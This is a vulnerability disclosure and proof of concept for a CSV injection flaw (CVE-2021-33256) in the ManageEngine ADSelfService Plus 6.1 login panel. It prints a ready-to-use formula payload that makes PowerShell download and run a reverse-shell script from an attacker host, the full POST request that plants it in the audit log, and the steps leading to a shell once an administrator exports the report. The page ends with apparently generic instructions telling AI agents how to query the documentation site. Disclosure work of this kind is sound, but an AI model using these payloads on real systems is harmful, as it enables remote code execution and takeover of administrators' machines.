# ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256) ### # Description There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. `j_username` parameter seems to vulnerable and reverse shell could be obtained if privileged user exports *"User Attempts Audit Report"* as CSV file. {% code title="Payload:" %} ``` =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0 ``` {% endcode %} ### # Proof Of Concept **1-** Malicious user sends POST request to login page `https://TARGET-IP/j_security_check` and sets `j_username` parameter as like the above payload. {% code title="j\_username parameter:" %} ``` =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')' ``` {% endcode %} ![](/files/-M_Hd80_mGdnuCpsXmEz) {% code title="POST Request:" %} ``` POST /j_security_check HTTP/1.1 Host: 192.168.1.253:9251 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 192 Origin: https://192.168.1.253:9251 Connection: close Referer: https://192.168.1.253:9251/j_security_check Cookie: * Upgrade-Insecure-Requests: 1 j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28 ``` {% endcode %} And the request attempt will be saved to*"User Attempts Audit Report"* table that is under the *Reports > Audit Reports* section. `Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12` `j_username` parameter value is saved to *"User Name"* column which is start of line in the CSV file: ``` =cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')' ``` **2-** Powershell command that sends reverse shell to attacker machine is embeded to last line of the`Invoke-PowershellTcp.ps1` file. ![](/files/-M_Hdm82W7S5j24idP85) **3-** If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user. ![Exporting User Attempts Audit Report as CSV file](/files/-M_Hdfk8dtkLXiSQ1xX1) ![Confirmation for Starting Another Application](/files/-M_HgxXQHVXrioNdm5A8) ![Exported CSV file](/files/-M_Hh9213DUVogbg2RiQ) ![Getting Reverse Shell](/files/-M_HhDy80hcV0m5F5YfM) {% embed url="" %} {% embed url="" %} ``` # Author: Metin Yunus Kandemir ``` ### # Reference {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.unsafe-inline.com/0day/manageengine-adselfservice-plus-6.1-csv-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.